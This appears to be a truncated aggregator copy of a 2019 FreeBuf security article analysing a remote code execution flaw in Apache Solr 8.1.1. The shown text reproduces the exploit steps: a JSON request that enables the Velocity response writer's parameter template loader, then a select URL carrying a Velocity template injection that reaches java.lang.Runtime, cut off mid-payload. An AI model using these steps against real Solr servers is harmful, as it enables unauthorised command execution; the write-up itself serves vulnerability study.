今天看啥  ›  专栏  ›  FreeBuf

Apache Solr最新RCE漏洞分析

FreeBuf  · 公众号  · 互联网安全  · 2019-11-01 17:54
引言Apache Solr爆出RCE 0day漏洞(漏洞编号未给出),这里简单的复现了对象,对整个RCE的流程做了一下分析,供各位看官参考。漏洞复现复现版本:8.1.1实现RCE,需要分两步,首先确认,应用开启了某个core(可以在Core Admin中查看),实例中应用开启了mycore,然后先向其config接口发送以下json数据,{ "update-queryresponsewriter": { "startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "true", "params.resource.loader.enabled": "true" }}接着访问如下url,即可实现RCE,/solr/mycore/select?wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.fo ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照